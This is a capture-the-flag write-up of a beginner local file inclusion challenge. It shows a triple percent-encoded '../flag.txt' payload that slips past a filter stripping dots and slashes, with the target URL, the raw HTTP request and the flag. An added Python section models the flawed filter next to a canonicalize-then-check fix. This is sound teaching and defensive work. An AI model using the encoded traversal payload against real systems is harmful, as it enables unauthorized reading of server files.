Tags: backdoor 

## Beginner/secret_of_j4ck4l

![image](https://github.com/zer00d4y/writeups/assets/128820441/69b19377-2173-46ff-b3e0-05ad52c33cc3)

This is a simple LFI, but the input passes through a filter that removes the `.` and `/` characters.

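The payload is `../flag.txt` with each `.` and `/` percent-encoded three times, so neither character appears literally in the request: `%25252e%25252e%25252fflag%25252etxt`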

http://34.132.132.69:8003/read_secret_message?file=%25252e%25252e%25252fflag%25252etxt

```http
GET /read_secret_message?file=%25252E%25252E%25252Fflag%25252Etxt HTTP/1.1
Host: 34.132.132.69:8003
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/Redacted Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close
```

![image](https://github.com/zer00d4y/writeups/assets/128820441/21e53ec7-28c2-400c-85ca-da7d9be2fd0d)

FLAG: `flag{s1mp13_l0c4l_f1l3_1nclus10n_0dg4af52gav}`
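
The defensive counterpart to the bypass above, as an added example that is not part of the original writeup or the challenge's code: the challenge source is not shown, so `naive_resolve` is an assumed model of a handler that strips `.` and `/` before the value is decoded, while `safe_resolve` decodes to a fixed point first and then checks that the path stays inside the base directory. `BASE_DIR` and all function names are hypothetical.

```python
import os
from urllib.parse import unquote

BASE_DIR = "/srv/app/messages"  # hypothetical directory the endpoint may read from
PAYLOAD = "%25252e%25252e%25252fflag%25252etxt"  # value taken from the writeup

def fully_decode(value: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing (canonical form)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def naive_resolve(value: str, base: str = BASE_DIR) -> str:
    """Assumed weak handler: strip '.' and '/' first, decode afterwards."""
    # The filter only sees '%', digits and letters, so it removes nothing.
    filtered = value.replace(".", "").replace("/", "")
    return os.path.normpath(os.path.join(base, fully_decode(filtered)))

def safe_resolve(value: str, base: str = BASE_DIR) -> str:
    """Canonicalize first, then require the result to stay inside base."""
    name = fully_decode(value)
    if "\x00" in name:
        raise ValueError("NUL byte in file name")
    base_real = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(base_real, name))
    # Containment check on the resolved path, not on the raw string.
    if os.path.commonpath([candidate, base_real]) != base_real:
        raise ValueError("path escapes base directory")
    return candidate

if __name__ == "__main__":
    print("naive:", naive_resolve(PAYLOAD))
    try:
        safe_resolve(PAYLOAD)
    except ValueError as exc:
        print("safe: rejected,", exc)
```

The fix does not depend on guessing how many encoding layers a request carries: the check runs on the resolved path, so any value that ends up outside `BASE_DIR` is rejected regardless of how it was written.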

Original writeup (https://github.com/zer00d4y/writeups/blob/main/CTF%20events/BackdoorCTF/BackdoorCTF_2023.md).